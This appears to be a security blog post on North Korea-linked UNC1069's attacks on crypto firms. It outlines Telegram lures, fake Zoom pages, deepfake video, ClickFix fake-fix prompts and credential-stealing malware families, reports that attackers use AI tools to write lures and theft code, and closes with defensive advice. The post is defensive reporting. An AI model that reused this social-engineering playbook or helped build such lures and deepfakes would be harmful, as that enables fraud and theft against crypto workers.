How North Korea-Linked UNC1069 Hackers Use AI Deepfakes to Target Crypto Organizations
How Hackers Use AI Deepfakes to Target
A dangerous hacking group tied to North Korea, known as UNC1069, is hitting the cryptocurrency world hard. They use clever tricks with AI-made videos and fake meetings to steal money and data from Windows and Mac computers. This threat shows how nation-state hackers are getting smarter with new tech to attack crypto firms.
Who is UNC1069 and Why Do They Target Crypto?
UNC1069 has been around since at least 2018. They go by other names like CryptoCore and MASAN in the security world. These hackers love social engineering – tricking people into doing things that help them steal. Their main goal? Steal crypto to fund North Korea’s needs.
Over time, they’ve changed targets. Before 2023, they hit banks and old-school finance. Now, they focus on Web3: crypto exchanges, software makers, tech companies, and venture capital funds. Why crypto? It’s full of money, and stealing digital wallets or login info can lead to huge payouts.
The Sneaky Attack Step by Step
The attack starts on Telegram. Hackers pretend to be big-shot investors or use hacked accounts of real startup bosses. They chat up victims – often crypto startup workers or devs – and set up a quick 30-minute meeting using Calendly.
Click the meeting link, and boom – you’re sent to a fake site like “zoom.uswe05[.]us”. It looks just like Zoom. You turn on your camera, type your name, and see what seems like a real call. But it’s not live. It’s either AI deepfakes or videos stolen from past victims’ webcams.
- Fake Zoom page: Copies real Zoom perfectly.
- Deepfake videos: AI tools like Gemini make realistic clips of fake people.
- Stolen footage: Your own webcam might get recorded and reused on others.
After the “call,” a fake error pops up: “Audio problem! Run this fix.” It’s a ClickFix trick – a bad command that installs malware.
New Malware Weapons in Their Arsenal
Once inside, UNC1069 drops up to seven malware types. Many are brand new, showing their skills are growing.
| Malware Name | What It Does | Targets |
|---|---|---|
| WAVESHAPER | Gathers system info, drops more tools | Mac (Mach-O binary via AppleScript) |
| HYPERCALL | Downloader for extra payloads | Mac |
| DEEPBREATH | Steals credentials by tweaking TCC database | iCloud Keychain, Chrome, Brave, Edge, Telegram, Apple Notes |
| CHROMEPUSH | Browser extension stealer + keylogger | Chrome, Brave (poses as Google Docs editor) |
| SILENCELIFT | New family for data grabs | Various |
| SUGARLOADER | Known downloader | Windows/Mac |
| BIGMACHO | Backdoor passed as Zoom SDK | Crypto victims |
These tools grab passwords, cookies, session tokens – everything needed to raid crypto accounts. One computer can get hit with all this, proving how serious they are about stealing funds.
AI Makes It Scarier: Deepfakes and Code Gen
What’s new? AI. UNC1069 uses tools like Gemini to:
- Create fake messages and lures about crypto deals.
- Make deepfake images and videos of crypto pros.
- Even write code for stealing crypto.
Deepfakes fool you into thinking it’s a real VC from a top firm. No more bad grammar in phishing emails – AI makes it pro-level. This shift to AI lures is a big upgrade from old spear-phishing.
This mix of social tricks, fake meetings, and AI videos is called GhostCall by some experts. It recycles victim videos to chain attacks.
Why Crypto Firms Are Prime Targets
Crypto is hot: billions in play, less rules than banks. Hackers hit:
- Centralized exchanges (CEX).
- Devs building wallets or protocols.
- VCs funding blockchain projects.
Steal one session token, drain a hot wallet. North Korea has stolen over $3 billion in crypto since 2017, per reports. UNC1069 adds to that pot.
How to Protect Your Crypto Organization
Don’t be the next victim. Simple steps work:
Spot the Tricks
- Check Telegram contacts: Verify via official sites.
- Hover links: Real Zoom is zoom.us, not weird domains.
- No camera? Use tools like Zoom’s web version only.
Tech Defenses
- Endpoint protection: Block ClickFix scripts.
- Browser extensions: Review all installs.
- TCC on Mac: Lock down permissions.
Training and Tools
- Train staff on deepfakes: Look for glitches.
- Use multi-factor auth (MFA) everywhere.
- Air-gapped wallets for big funds.
- Monitor for new malware like DEEPBREATH.
Invest in AI security too – tools that spot deepfakes.
The Bigger Picture: Nation-State Threats in Web3
UNC1069 isn’t alone. North Korea runs many groups hitting crypto. This attack shows evolution: From emails to AI chats. Web3 must level up security or lose trust.
Stay alert. Share intel in crypto communities. The fight against
Final Thoughts
What do you think? Drop a comment on how you’re securing against AI phishing.
